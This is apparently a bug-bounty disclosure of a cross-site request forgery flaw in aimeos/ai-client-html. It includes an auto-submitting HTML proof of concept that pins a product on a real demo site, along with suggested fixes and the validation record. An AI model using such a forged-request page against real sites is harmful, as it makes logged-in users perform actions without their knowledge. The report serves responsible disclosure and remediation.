Cross-Site Request Forgery (CSRF) in aimeos/ai-client-html

Valid

Reported on

Aug 27th 2021


✍️ Description

Attacker able to pin any product in favorites with CSRF attack.

In CSRF attacks it is necessary that a user logged into your application and just going to a malicious website and after that only with a redirection attacker can perform attack on unprotected endpoint, this means only with visiting a site a unwanted action will be perform without that user aware from that.

🕵️‍♂️ Proof of Concept

1.First of all admin or user with right privileges already should be logged in Browser.

2.Open the PoC.html (it is auto-submit).

3.Here favorite product with id 273 will be pined after the PoC.html file opened.

// PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://laravel.demo.aimeos.org/perf/en/EUR/pin/add/273/jade-fluffy-byssus-negligee-2">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

This PoC can perform attack without that users noticed and Also PoC can send multiple request at same time that means attacker can Bruteforce all possible actions ( with using multiple Iframe )

💥 Impact

This vulnerability is capable of make medium damage of integrity of system.

Fix

The easiest way that you set strict attribute on each cookie, Or you set Lax and Use GET requests only for receiving data not changing them.

The best way is that you set a CSRF token in each endpoint.

We have contacted a member of the aimeos/ai-client-html team and are waiting to hear back a year ago
amammad
a year ago

Researcher


@admin can you change cve score to this :

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L

as dear maintainer request that.

amammad
a year ago

Researcher


dear @maintainer, I think you missed this report.

Jamie Slome
a year ago

Admin


Sorted!

Jamie Slome
a year ago

Admin


The CVSS already reflects this vector.

Aimeos validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Aimeos confirmed that a fix has been merged on 2d596a 10 months ago
Aimeos has been awarded the fix bounty
to join this conversation